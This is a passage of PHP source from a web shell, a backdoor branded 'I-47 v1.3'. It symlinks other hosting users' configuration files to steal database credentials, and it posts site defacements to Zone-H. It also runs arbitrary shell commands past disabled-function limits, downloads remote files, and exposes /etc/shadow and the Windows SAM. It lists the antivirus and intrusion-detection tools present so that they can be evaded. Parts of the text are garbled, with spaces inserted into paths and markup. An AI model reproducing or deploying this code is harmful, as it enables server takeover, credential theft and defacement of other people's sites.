 389       symlink(' / home7 / '.$usern.' / public_html / support / configuration . php',$pdomain.' ~ ~Whm3 . txt');
 390       symlink(' / home7 / '.$usern.' / public_html / client / configuration . php',$pdomain.' ~ ~Whm4 . txt');
 391       symlink(' / home7 / '.$usern.' / public_html / billings / configuration . php',$pdomain.' ~ ~Whm5 . txt');
 392       symlink(' / home7 / '.$usern.' / public_html / billing / configuration . php',$pdomain.' ~ ~Whm6 . txt');
 393       symlink(' / home7 / '.$usern.' / public_html / clients / configuration . php',$pdomain.' ~ ~Whm7 . txt');
 394       symlink(' / home7 / '.$usern.' / public_html / whmcs / configuration . php',$pdomain.' ~ ~Whm8 . txt');
 395       symlink(' / home7 / '.$usern.' / public_html / order / configuration . php',$pdomain.' ~ ~Whm9 . txt');
 396       symlink(' / home7 / '.$usern.' / public_html / admin / conf . php',$pdomain.' ~ ~5.txt');
 397       symlink(' / home7 / '.$usern.' / public_html / admin / config . php',$pdomain.' ~ ~4.txt');
 398       symlink(' / home7 / '.$usern.' / public_html / conf_global . php',$pdomain.' ~ ~invisio . txt');
 399       symlink(' / home7 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~7.txt');
 400       symlink(' / home7 / '.$usern.' / public_html / connect . php',$pdomain.' ~ ~8.txt');
 401       symlink(' / home7 / '.$usern.' / public_html / mk_conf . php',$pdomain.' ~ ~mk - portale1 . txt');
 402       symlink(' / home7 / '.$usern.' / public_html / include / config . php',$pdomain.' ~ ~12.txt');
 403       symlink(' / home7 / '.$usern.' / public_html / settings . php',$pdomain.' ~ ~Smf . txt');
 404       symlink(' / home7 / '.$usern.' / public_html / includes / functions . php',$pdomain.' ~ ~phpbb3 . txt');
 405       symlink(' / home7 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~infinity . txt');
 406   }
 407       
 408   // Zone-h Poster
 409   function ZoneH($url, $hacker, $hackmode,$reson, $site )
 410   {
 411       $k = curl_init();
 412       curl_setopt($k, CURLOPT_URL, $url);
 413       curl_setopt($k,CURLOPT_POST,true);
 414       curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
 415       curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
 416       curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
 417       $kubra = curl_exec($k);
 418       curl_close($k);
 419       return $kubra;
 420   }
 421   
 422   // Database functions
 423   function listdatabase()
 424   {   
 425       $self=$_SERVER["PHP_SELF"];
 426       ?>
 427       <br>
 428       <form>
 429       <input type="hidden" name="action" value="createDB">
 430           <table>
 431           <tr>
 432               <td><input type="text" class="box" name="dbname"></td><td><input type="submit" value="  Create Database  " name="createmydb" class="but"></td>
 433           </tr>
 434           </table>
 435       </form>
 436           <br>
 437       <?php 
 438       $mysqlHandle = mysql_connect ($_COOKIE['dbserver'], $_COOKIE['dbuser'], $_COOKIE['dbpass']);
 439       $result = mysql_query("SHOW DATABASE"); 
 440       echo "<table cellspacing=1 cellpadding=5 border=1 style=width:60%;>
 441 ";
 442 
 443       $pDB = mysql_list_dbs( $mysqlHandle );
 444       $num = mysql_num_rows( $pDB );
 445       for( $i = 0; $i < $num; $i++ ) 
 446       {
 447           $dbname = mysql_dbname( $pDB, $i );
 448           mysql_select_db($dbname,$mysqlHandle);
 449           $result = mysql_query("SHOW TABLES"); 
 450           $num_of_tables = mysql_num_rows($result);
 451           echo "<tr>
 452 ";
 453           echo "<td><a href='$self ? action = listTables & dbname = $dbname'><font color=red size=3>$dbname</font></a> ($num_of_tables)</td>
 454 ";
 455           echo "<td><a href='$self ? action = listTables & dbname = $dbname'>Tables</a></td>
 456 ";
 457           echo "<td><a href='$self ? action = dropDB & dbname = $dbname & executequery' onClick=\"return confirm('DropDatabase\'$dbname\'?') \">Drop</a></td>
 458 ";
 459         echo "<td><a href='$self?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>
 460 ";
 461         echo "</tr>
 462 ";
 463     }
 464     echo "</table>
 465 ";
 466     mysql_close($mysqlHandle);
 467 }
 468 function listtable() {
 469     $self = $_SERVER["PHP_SELF"];
 470     $dbserver = $_COOKIE["dbserver"];
 471     $dbuser = $_COOKIE["dbuser"];
 472     $dbpass = $_COOKIE["dbpass"];
 473     $dbname = $_GET['dbname'];
 474     echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
 475 ?>
 476        <br><br>
 477        <form>
 478        <input type="hidden" name="action" value="createtable">
 479        <input type="hidden" name="dbname" value="<?php echo $_GET['dbname']; ?>">
 480            <table>
 481            <tr>
 482                <td><input type="text" class="box" name="tablename"></td><td><input type="submit" value="  Create Table  " name="createmydb" class="but"></td>
 483            </tr>
 484            </table>
 485        
 486            <br>
 487            <form>
 488            <input type="hidden" value="<?php echo $_GET['dbname']; ?>" name="dbname">
 489            <input type="hidden" value="<?php echo $_GET['tablename']; ?>" name="tablename">
 490            <input type="hidden" value="executequery" name="action">
 491            <table>
 492                <tr>
 493                    <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
 494                </tr>
 495                <tr>
 496                    <td><input type="submit" value="Execute" class="but"></td>
 497                </tr>
 498            </table>
 499            </form>
 500            
 501        <?php
 502     $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
 503     mysql_select_db($dbname);
 504     $pTable = mysql_list_tables($dbname);
 505     if ($pTable == 0) {
 506         $msg = mysql_error();
 507         echo "<h3>Error : $msg</h3><p>
 508 ";
 509         return;
 510     }
 511     $num = mysql_num_rows($pTable);
 512     echo "<table cellspacing=1 cellpadding=5 border=1 style=width:60%;>
 513 ";
 514     for ($i = 0;$i < $num;$i++) {
 515         $tablename = mysql_tablename($pTable, $i);
 516         $result = mysql_query("select * from $tablename");
 517         $num_rows = mysql_num_rows($result);
 518         echo "<tr>
 519 ";
 520         echo "<td>
 521 ";
 522         echo "<a href='$self?action=viewdata&dbname=$dbname&tablename=$tablename'><font color=red size=3>$tablename</font></a> ($num_rows)
 523 ";
 524         echo "</td>
 525 ";
 526         echo "<td>
 527 ";
 528         echo "<a href='$self?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>
 529 ";
 530         echo "</td>
 531 ";
 532         echo "<td>
 533 ";
 534         echo "<a href='$self?action=viewdata&dbname=$dbname&tablename=$tablename'>Data</a>
 535 ";
 536         echo "</td>
 537 ";
 538         echo "<td>
 539 ";
 540         echo "<a href='$self?action=empty&dbname=$dbname&tablename=$tablename'>Empty</a>
 541 ";
 542         echo "</td>
 543 ";
 544         echo "<td>
 545 ";
 546         echo "<a href='$self?action=dropTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Drop Table \'$tablename\'?')\">Drop</a>
 547 ";
 548         echo "</td>
 549 ";
 550         echo "</tr>
 551 ";
 552     }
 553     echo "</table></form>";
 554     mysql_close($mysqlHandle);
 555     echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
 556 }
 557 function paramexe($n, $v) {
 558     $v = trim($v);
 559     if ($v) {
 560         echo '<span><font color=red size=3>' . $n . ': </font></span>';
 561         if (strpos($v, "
 562 ") === false) echo '<font color=red size=2>' . $v . '</font><br>';
 563         else echo '<pre class=ml1><font color=lime size=3>' . $v . '</font></pre>';
 564     }
 565 }
 566 $dir = getcwd();
 567 if (isset($_GET['dir'])) {
 568     $dir = $_GET['dir'];
 569 }
 570 function dis() {
 571     if (!ini_get('disable_functions')) {
 572         echo "None";
 573     } else {
 574         echo @ini_get('disable_functions');
 575     }
 576 }
 577 function mycmdexec($cmd) {
 578     global $disablefunc;
 579     $result = "";
 580     if (!empty($cmd)) {
 581         if (is_callable("exec") and !in_array("exec", $disablefunc)) {
 582             exec($cmd, $result);
 583             $result = join("
 584 ", $result);
 585         } elseif (($result = "$cmd") !== FALSE) {
 586         } elseif (is_callable("system") and !in_array("system", $disablefunc)) {
 587             $v = @ob_get_contents();
 588             @ob_clean();
 589             system($cmd);
 590             $result = @ob_get_contents();
 591             @ob_clean();
 592             echo $v;
 593         } elseif (is_callable("passthru") and !in_array("passthru", $disablefunc)) {
 594             $v = @ob_get_contents();
 595             @ob_clean();
 596             passthru($cmd);
 597             $result = @ob_get_contents();
 598             @ob_clean();
 599             echo $v;
 600         } elseif (is_resource($fp = popen($cmd, "r"))) {
 601             $result = "";
 602             while (!feof($fp)) {
 603                 $result.= fread($fp, 1024);
 604             }
 605             pclose($fp);
 606         }
 607     }
 608     return $result;
 609 }
 610 function rrmdir($dir) {
 611     if (is_dir($dir)) // ensures that we actually have a directory
 612     {
 613         $objects = scandir($dir); // gets all files and folders inside
 614         foreach ($objects as $object) {
 615             if ($object != '.' && $object != '..') {
 616                 if (is_dir($dir . '/' . $object)) {
 617                     // if we find a directory, do a recursive call
 618                     rrmdir($dir . '/' . $object);
 619                 } else {
 620                     // if we find a file, simply delete it
 621                     unlink($dir . '/' . $object);
 622                 }
 623             }
 624         }
 625         // the original directory is now empty, so delete it
 626         rmdir($dir);
 627     }
 628 }
 629 function godir($dir) {
 630     //echo $dir;
 631     $zip = new ZipArchive();
 632     $filename = basename($dir) . '.zip';
 633     // open archive
 634     if ($zip->open($filename, ZIPARCHIVE::CREATE) !== TRUE) {
 635         die("Could not open archive");
 636     } else echo "fdg";
 637     if (is_dir($dir)) // ensures that we actually have a directory
 638     {
 639         $objects = scandir($dir); // gets all files and folders inside
 640         foreach ($objects as $object) {
 641             if ($object != '.' && $object != '..') {
 642                 if (is_dir($dir . '\' . $object))
 643                   {//echo $dir . ' / ' . $object;
 644                       // if we find a directory, do a recursive call
 645                       godir($dir . '\' . $object);
 646                   }
 647                   else
 648                   {
 649                       // if we find a file, simply add it
 650                       $zip->addFile($dir . '\' . $object) or die ("ERROR: Could not add file: $key");
 651                   }
 652               }
 653           }
 654           // finally, try to add the directory path itself to the archive
 655           $zip->addFile($dir) or die ("ERROR: Could not add file: $key");
 656       }       
 657   } 
 658   
 659   
 660               
 661   function which($pr)
 662   { 
 663       $path = execmd("which $pr"); 
 664       if(!empty($path)) 
 665           return trim($path); 
 666       else 
 667           return trim($pr); 
 668   }
 669   
 670   function cf($f,$t) 
 671   { 
 672         $w=@fopen($f,"w") or @function_exists('file_put_contents'); 
 673         if($w)
 674       { 
 675              @fwrite($w,gzinflate(base64_decode($t))) or @fputs($w,gzinflate(base64_decode($t))) or @file_put_contents($f,gzinflate(base64_decode($t))); 
 676              @fclose($w); 
 677         }
 678   }   
 679           
 680   function remotedownload($cmd,$url)
 681   { 
 682       $namafile = basename($url); 
 683       switch($cmd) 
 684       { 
 685           case 'wwget': 
 686               execmd(which('wget')." ".$url." -O ".$namafile);
 687               break; 
 688           case 'wlynx': 
 689               execmd(which('lynx')." -source ".$url." > ".$namafile);
 690               break; 
 691           case 'wfread' : 
 692               execmd($wurl,$namafile);
 693               break; 
 694           case 'wfetch' : 
 695               execmd(which('fetch')." -o ".$namafile." -p ".$url);
 696               break; 
 697           case 'wlinks' : 
 698               execmd(which('links')." -source ".$url." > ".$namafile);
 699               break; 
 700           case 'wget' : 
 701               execmd(which('GET')." ".$url." > ".$namafile);
 702               break; 
 703           case 'wcurl' : 
 704               execmd(which('curl')." ".$url." -o ".$namafile);
 705               break; 
 706           default: 
 707           break; 
 708       } 
 709       return $namafile; 
 710   }
 711   
 712   function magicboom($text)
 713   { 
 714       if (!get_magic_quotes_gpc()) 
 715           return $text; 
 716       return stripslashes($text); 
 717   }
 718   
 719   function checkproxyhost()
 720   {
 721       $host = getenv("HTTP_HOST");
 722       $filename = ' / tmp / . setan / xh';
 723       if (file_exists($filename)) 
 724       {
 725           $_POST['proxyhostmsg']="</br></br><center><font color=red size=3><b>Success!</b></font></br></br><a href=$host:6543>$host:6543</a></br></br><b>Note:</b> If '$host' have a good firewall or IDS  installed on their server, it will probably catch this or stop it from ever opening a port and you won'tbeabletoconnecttothisproxy . < / br > < / br > < / center > ";
 726           } else {
 727           $_POST['proxyhostmsg']=" < / br > < / br > < center > < fontcolor = redsize = 4 > < b > Failed! < / b > < / font > < / br > < / br > < fontcolor = redsize = 3 > Note : < / b > If for somereasonwewouldnotcreate and extracttheneedproxyfilesin'/tmp'thiswillmakethisfail . < / font > < / br > < / br > < / center > ";
 728        } 
 729 }
 730 
 731 
 749 function execmd($cmd,$d_functions="None")
 750 {
 751     if($d_functions=="None") 
 752   {
 753       $ret=passthru($cmd); 
 754       return $ret;
 755   }
 756     $funcs=array("shell_exec","exec","passthru","system","popen","proc_open");
 757     $d_functions=str_replace("","",$d_functions);
 758     $dis_funcs=explode(", ",$d_functions);
 759     foreach($funcs as $safe)
 760     {
 761         if(!in_array($safe,$dis_funcs)) 
 762         {
 763             if($safe=="exec")
 764             {
 765                 $ret=@exec($cmd);
 766                 $ret=join("",$ret);
 767                 return $ret;
 768             }
 769             elseif($safe=="system")
 770             {
 771                 $ret=@system($cmd);
 772                 return $ret;
 773             }
 774             elseif($safe=="passthru")
 775             {
 776                 $ret=@passthru($cmd);
 777                 return $ret;
 778             }
 779             elseif($safe=="shell_exec")
 780             {
 781                 $ret=@shell_exec($cmd);
 782                 return $ret;
 783             }
 784             elseif($safe=="popen")
 785             {
 786                 $ret=@popen("$cmd",'r');
 787                 if(is_resource($ret))
 788                 {
 789                     while(@!feof($ret))
 790                     $read.=@fgets($ret);
 791                     @pclose($ret);
 792                     return $read;
 793                 }
 794                 return -1;
 795             }
 796             elseif($safe="proc_open")
 797             {
 798                 $cmdpipe=array(
 799                 0=>array('pipe','r'),
 800                 1=>array('pipe','w')
 801                 );
 802                 $resource=@proc_open($cmd,$cmdpipe,$pipes);
 803                 if(@is_resource($resource))
 804                 {
 805                     while(@!feof($pipes[1]))
 806                     $ret.=@fgets($pipes[1]);
 807                     @fclose($pipes[1]);
 808                     @proc_close($resource);
 809                     return $ret;
 810                 }
 811                 return -1;
 812             }
 813         }
 814     }
 815     return -1;
 816 }
 817 
 818   function getDisabledFunctions()
 819   {
 820       if(!ini_get('disable_functions'))
 821       {
 822           return "None";
 823       }
 824       else
 825       {
 826               return @ini_get('disable_functions');
 827       }
 828   }
 829   
 830   function getFilePermissions($file)
 831 {
 832     
 833 $perms = fileperms($file);
 834 
 835 if (($perms & 0xC000) == 0xC000) {
 836     // Socket
 837     $info = 's';
 838 } elseif (($perms & 0xA000) == 0xA000) {
 839     // Symbolic Link
 840     $info = 'l';
 841 } elseif (($perms & 0x8000) == 0x8000) {
 842     // Regular
 843     $info = '-';
 844 } elseif (($perms & 0x6000) == 0x6000) {
 845     // Block special
 846     $info = 'b';
 847 } elseif (($perms & 0x4000) == 0x4000) {
 848     // Directory
 849     $info = 'd';
 850 } elseif (($perms & 0x2000) == 0x2000) {
 851     // Character special
 852     $info = 'c';
 853 } elseif (($perms & 0x1000) == 0x1000) {
 854     // FIFO pipe
 855     $info = 'p';
 856 } else {
 857     // Unknown
 858     $info = 'u';
 859 }
 860 
 861 // Owner
 862 $info .= (($perms & 0x0100) ? 'r' : '-');
 863 $info .= (($perms & 0x0080) ? 'w' : '-');
 864 $info .= (($perms & 0x0040) ?
 865             (($perms & 0x0800) ? 's' : 'x' ) :
 866             (($perms & 0x0800) ? 'S' : '-'));
 867 
 868 // Group
 869 $info .= (($perms & 0x0020) ? 'r' : '-');
 870 $info .= (($perms & 0x0010) ? 'w' : '-');
 871 $info .= (($perms & 0x0008) ?
 872             (($perms & 0x0400) ? 's' : 'x' ) :
 873             (($perms & 0x0400) ? 'S' : '-'));
 874 
 875 // World
 876 $info .= (($perms & 0x0004) ? 'r' : '-');
 877 $info .= (($perms & 0x0002) ? 'w' : '-');
 878 $info .= (($perms & 0x0001) ?
 879             (($perms & 0x0200) ? 't' : 'x' ) :
 880             (($perms & 0x0200) ? 'T' : '-'));
 881 
 882 return $info;
 883 
 884 }
 885   
 886 
 887   function yourip()
 888   {
 889       echo $_SERVER["REMOTE_ADDR"];
 890   }
 891   function odi()
 892   {
 893       $od = @ini_get("open_basedir");
 894       echo $od;
 895   }
 896   function phpver()
 897   {
 898       $pv=@phpversion();
 899       echo $pv;
 900   }
 901   function serverip()
 902   {
 903       echo getenv('SERVER_ADDR');
 904   }
 905   function serverport()
 906   {
 907       echo $_SERVER['SERVER_PORT'];
 908   }
 909   function cip()
 910   {
 911       echo $_SERVER["SERVER_NAME"];
 912   }
 913   function  safe()
 914   {
 915       global $sm;
 916       return $sm?"ON : ( : '( (Most of the Features will Not Work!)":"OFF";
 917   }
 918   function browse()
 919   {
 920       $brow= $_SERVER["HTTP_USER_AGENT"];
 921       print($brow);
 922   }
 923   function serveradmin()
 924   {
 925       echo $_SERVER['SERVER_ADMIN'];
 926   }
 927   function mysq()
 928   {
 929       echo function_exists('mysql_connect')?("<font color='red'>Enabled</font>"):("Disabled");
 930   }
 931   function systeminfo()
 932   {
 933       echo php_uname();
 934   }
 935   function curlinfo()
 936   {
 937       echo function_exists('curl_version')?("<font color='lime'>Enabled</font>"):("<font color='red'>Disabled</font>");
 938   }
 939   function oracleinfo()
 940   {
 941       echo function_exists('ocilogon')?("<font color='lime'>Enabled</font>"):("<font color='red'>Disabled</font>");
 942   }
 943   function mysqlinfo()
 944   {
 945       echo function_exists('mysql_connect')?("<font color='lime'>Enabled</font>"):("<font color='red'>Disabled</font>");
 946   }
 947   function mssqlinfo()
 948   {
 949       echo function_exists('mssql_connect')?("<font color='lime'>Enabled</font>"):("<font color='red'>Disabled</font>");
 950   }
 951   function postgresqlinfo()
 952   {
 953       echo function_exists('pg_connect')?("<font color='lime'>Enabled</font>"):("<font color='red'>Disabled</font>");
 954   }
 955   function softwareinfo()
 956   {
 957       echo getenv("SERVER_SOFTWARE");
 958   }
 959   function download()
 960   {
 961       $frd=$_GET['download'];
 962       $prd=explode("/",$frd);
 963       for($i=0;$i<sizeof($prd);$i++)
 964       {
 965           $nfd=$prd[$i];
 966       }
 967       @ob_clean(); 
 968      header("Content-type: application/octet-stream"); 
 969      header("Content-length: ".filesize($nfd)); 
 970      header("Content-disposition: attachment; filename=\"".$nfd."\";"); 
 971          readfile($nfd);
 972 
 973          exit;
 974   
 975   }
 976       
 977   function HumanReadableFilesize($size)
 978     {
 979  
 980         $mod = 1024;
 981  
 982         $units = explode('','BKBMBGBTBPB');
 983         for ($i = 0; $size > $mod; $i++) 
 984         {
 985             $size /= $mod;
 986         }
 987  
 988         return round($size, 2) . '' . $units[$i];
 989     }
 990   
 991   function showDrives()
 992     {
 993         global $self;
 994         foreach(range('A','Z') as $drive)
 995         {
 996             if(is_dir($drive.':
 997                     \'))
 998             {
 999                 ?>
1000                 <a class="dir" href=' < ? phpecho $self ?>?dir=<?php echo $drive . ":\"; ?>'>
1001                     <?php echo $drive." : \" ?>
1002                 </a> 
1003                 <?php
1004             }
1005         }
1006     }
1007   function diskSpace()
1008   {
1009       echo HumanReadableFilesize(disk_total_space(" / "));
1010   }   
1011   function freeSpace()
1012   {
1013      echo HumanReadableFilesize(disk_free_space(" / "));
1014   }
1015   
1016   function thiscmd($p) 
1017   {
1018       $path = myexe('which ' . $p);
1019       if(!empty($path))
1020           return $path;
1021       return false;
1022   }
1023 
1024   function split_dir()
1025   {
1026       $de=explode(" / ",getcwd());
1027       $del=$de[0];
1028       for($count=0;$count<sizeof($de);$count++)
1029       {
1030       $imp=$imp.$de[$count].'/';
1031           
1032       echo " < ahref = ".$self." ? open = ".$imp." > ".$de[$count]." < / a > / ";
1033       }
1034       
1035   }
1036   
1037   function mysecinfo()
1038   {
1039       
1040       function myparam($n, $v) 
1041       {
1042           $v = trim($v);
1043           if($v) 
1044           {
1045               echo '<span><font color =red size=3>' . $n . ': </font></span>';
1046               if(strpos($v, "") === false)
1047                   echo '<font color =lime size=3>' . $v . '</font><br>';
1048               else
1049                   echo '<pre class=ml1><font color =lime size=3>' . $v . '</font></pre>';
1050           }
1051       }
1052   
1053       myparam('Server software', @getenv('SERVER_SOFTWARE'));
1054       if(function_exists('apache_get_modules'))
1055           myparam('Loaded Apache modules', implode(', ', apache_get_modules()));
1056       myparam('Open base dir', @ini_get('open_basedir'));
1057       myparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
1058       myparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
1059       $temp=array();
1060       if(function_exists('mysql_get_client_info'))
1061           $temp[] = "MySql(".mysql_get_client_info().") ";
1062       if(function_exists('mssql_connect'))
1063           $temp[] = "MSSQL";
1064       if(function_exists('pg_connect'))
1065           $temp[] = "PostgreSQL";
1066       if(function_exists('oci_connect'))
1067           $temp[] = "Oracle";
1068       myparam('Supported databases', implode(', ', $temp));
1069       echo '<br>';
1070   
1071       if($GLOBALS['os'] == 'Linux') {
1072               myparam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes < ahref = '$self?passwd' > [view] < / a > ":'no');
1073               myparam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes < ahref = '#'onclick = 'g(\"FilesTools\", \"/etc/\", \"shadow\")' > [view] < / a > ":'no');
1074               myparam('OS version', @file_get_contents('/proc/version'));
1075               myparam('Distr name', @file_get_contents('/etc/issue.net'));
1076               myparam('Where is Perl?', myexe('whereis perl'));
1077               myparam('Where is Python?', myexe('whereis python'));
1078               myparam('Where is gcc?', myexe('whereis gcc'));
1079               myparam('Where is apache?', myexe('whereis apache'));
1080               myparam('CPU?', myexe('cat /proc/cpuinfo'));
1081               myparam('RAM', myexe('free -m'));
1082               myparam('Mount options', myexe('cat /etc/fstab'));
1083               myparam('User Limits', myexe('ulimit -a'));
1084               
1085               
1086               if(!$GLOBALS['safe_mode']) {
1087                   $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
1088                   $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
1089                   $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
1090                   echo '<br>';
1091                   $temp=array();
1092                   foreach ($userful as $item)
1093                       if(thiscmd($item))
1094                           $temp[] = $item;
1095                   myparam('Userful', implode(', ',$temp));
1096                   $temp=array();
1097                   foreach ($danger as $item)
1098                       if(thiscmd($item))
1099                           $temp[] = $item;
1100                   myparam('Danger', implode(', ',$temp));
1101                   $temp=array();
1102                   foreach ($downloaders as $item)
1103                       if(thiscmd($item))
1104                           $temp[] = $item;
1105                   myparam('Downloaders', implode(', ',$temp));
1106                   echo '<br/>';
1107                   myparam('HDD space', myexe('df -h'));
1108                   myparam('Hosts', @file_get_contents('/etc/hosts'));
1109                   
1110               }
1111       } else {
1112           echo " < fontcolor = redsize = 3 > PasswordFile : < / font > < ahref = ".$_SERVER['PHP_SELF']." ? download = " . $_SERVER["WINDIR"]."epair\sam > < b > < fontcolor = limesize = 3 > Downloadpasswordfile < / font > < / b > < / a > < br > ";
1113           echo " < fontcolor = redsize = 3 > ConfigFiles : < / font > < ahref = ".$_SERVER['PHP_SELF']." ? open = " . $_SERVER["WINDIR"]."\system32\drivers\etc\hosts > < b > < fontcolor = limesize = 3 > [Hosts] < / font > < / b > < / a > & nbsp; < ahref = ".$_SERVER['PHP_SELF']." ? open = " . $_SERVER["WINDIR"]."\system32\drivers\etcetworks > < b > < fontcolor = limesize = 3 > [LocalNetworkMap] < / font > < / b > < / a > & nbsp; < ahref = ".$_SERVER['PHP_SELF']." ? open = " . $_SERVER["WINDIR"]."\system32\drivers\etc\lmhosts . sam > < b > < fontcolor = limesize = 3 > [lmhosts] < / font > < / b > < / a > < br > ";
1114           $base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
1115           echo " < fontcolor = redsize = 3 > OpenBaseDir : < / font > < fontcolor = limesize = 3 > " . $base . " < / font > < br > ";
1116           myparam('OS Version',myexe('ver'));
1117           myparam('Account Settings',myexe('net accounts'));
1118           myparam('User Accounts',myexe('net user'));
1119       }
1120       echo '</div>';
1121   }
1122   
1123   
1124   
1125   function myexe($in) {
1126   $out = '';
1127   if (function_exists('exec')) {
1128       @exec($in,$out);
1129       $out = @join("",$out);
1130   } elseif (function_exists('passthru')) {
1131       ob_start();
1132       @passthru($in);
1133       $out = ob_get_clean();
1134   } elseif (function_exists('system')) {
1135       ob_start();
1136       @system($in);
1137       $out = ob_get_clean();
1138   } elseif (function_exists('shell_exec')) {
1139       $out = shell_exec($in);
1140   } elseif (is_resource($f = @popen($in,"r"))) {
1141       $out = "";
1142       while(!@feof($f))
1143           $out .= fread($f,1024);
1144       pclose($f);
1145   }
1146   return $out;
1147 }
1148   
1149   function exec_all($command)
1150 {
1151     
1152     $output = '';
1153     if(function_exists('exec'))
1154     {   
1155         exec($command,$output);
1156         $output = join("",$output);
1157     }
1158     
1159     else if(function_exists('shell_exec'))
1160     {
1161         $output = shell_exec($command);
1162     }
1163     
1164     else if(function_exists('popen'))
1165     {
1166         $handle = popen($command , "r"); // Open the command pipe for reading
1167         if(is_resource($handle))
1168         {
1169             if(function_exists('fread') && function_exists('feof'))
1170             {
1171                 while(!feof($handle))
1172                 {
1173                     $output .= fread($handle, 512);
1174                 }
1175             }
1176             else if(function_exists('fgets') && function_exists('feof'))
1177             {
1178                 while(!feof($handle))
1179                 {
1180                     $output .= fgets($handle,512);
1181                 }
1182             }
1183         }
1184         pclose($handle);
1185     }
1186     
1187     
1188     else if(function_exists('system'))
1189     {
1190         ob_start(); //start output buffering
1191         system($command);
1192         $output = ob_get_contents();    // Get the output
1193         ob_end_clean();                 // Stop output buffering
1194     }
1195     
1196     else if(function_exists('passthru'))
1197     {
1198         ob_start(); //start output buffering
1199         passthru($command);
1200         $output = ob_get_contents();    // Get the output
1201         ob_end_clean();                 // Stop output buffering            
1202     }
1203     
1204     else if(function_exists('proc_open'))
1205     {
1206         $descriptorspec = array(
1207                 1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
1208                 );
1209         $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'
1210         if(is_resource($handle))
1211         {
1212             if(function_exists('fread') && function_exists('feof'))
1213             {
1214                 while(!feof($pipes[1]))
1215                 {
1216                     $output .= fread($pipes[1], 512);
1217                 }
1218             }
1219             else if(function_exists('fgets') && function_exists('feof'))
1220             {
1221                 while(!feof($pipes[1]))
1222                 {
1223                     $output .= fgets($pipes[1],512);
1224                 }
1225             }
1226         }
1227         pclose($handle);
1228     }
1229     
1230     return(htmlspecialchars($output));
1231     
1232 }
1233 
1234 
1235 ?>
1236 
1237 <?php
1238 
1239 
1240 $pinfo = "info"; 
1241 if(isset($_GET["com"]))
1242 {
1243   phpinfo();
1244 }
1245 else
1246 {
1247 $basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?" < fontcolor = 'lime' > ON < / font > ":" < fontcolor = 'red' > OFF < / font > ";
1248 $etc_passwd=@is_readable(" / etc / passwd")?"Yes":"No";
1249 ?>
1250 <div align="center">
1251 <a href=" < ? php $_SERVER['PHP_SELF']; ?>"><font size="6" color="#FF0000" style="text-decoration:none;" face="Times New Roman, Times, serif">I-47 v1.3: By Arjun </font></a>
1252 
1253 </div>
1254 <hr>
1255    
1256 <table cellpadding="0" style="width:100%;">
1257    <tr>
1258        <td colspan="3" style="width:85%;">System Info : <font class="txt"><?php systeminfo(); ?></font></td>
1259        <td style="width:15%;"><a href="<?php $_SERVER['PHP_SELF']; ?>?com=info" target="_blank"><font class="txt"><i>Software Info</i></font></a></td>
1260    </tr>
1261    <tr>
1262        <td style="width:85%;" colspan="3">Software : <font class="txt"><?php softwareinfo(); ?></font></td>
1263        <td style="width:15%;">Server Port : <font class="txt"><?php serverport(); ?></font></td>
1264    </tr>
1265    
1266    <?php if ($os != 'Windows' || shell_exec("id") != null) { ?><tr>
1267        <td style="width:75%;" colspan="3">Uid : <font class="txt"><?php echo shell_exec("id"); ?></font></td>
1268    </tr><?php
1269                     } ?>
1270    <tr>
1271        <td style="width:20%;">Disk Space : <font class="txt"><?php diskSpace(); ?></font></td>
1272        <td style="width:20%;">Free Space : <font class="txt"><?php freeSpace(); ?></font></td>
1273        
1274        <td style="width:20%;">Server IP : <font class="txt"><a href="http://whois.domaintools.com/<?php serverip(); ?>"><?php serverip(); ?></a></font></td>
1275        <td style="width:15%;">Your IP : <font class="txt"><a href="http://whois.domaintools.com/<?php yourip(); ?>"><?php yourip(); ?></a></font></td>
1276    </tr>
1277    
1278    <tr>
1279        <?php if ($os == 'Windows') { ?><td style="width:15%;">View Directories : <font class="txt"><?php echo showDrives(); ?></font></td><?php
1280                     } ?>
1281        <?php if ($os != 'Windows') { ?><td colspan=2 style="width:20%;">Current Directory : <font color="#009900"><?php
1282                         $d = str_replace("\",$directorysperator,$dir);
1283   if (substr($d,-1) != $directorysperator) {$d.= $directorysperator;
1284                         }
1285   $d = str_replace("\","\",$d);
1286   $dispd = htmlspecialchars($d);
1287   $pd = $e = explode($directorysperator,substr($d,0,-1));
1288   $i = 0;
1289   foreach($pd as $b)
1290   {
1291    $t = '';
1292    $j = 0;
1293    foreach ($e as $r)
1294    {
1295     $t.= $r.$directorysperator;
1296     if ($j == $i) {break;}
1297     $j++;
1298    }
1299   
1300   
1301   $href='dir='.$t;
1302   
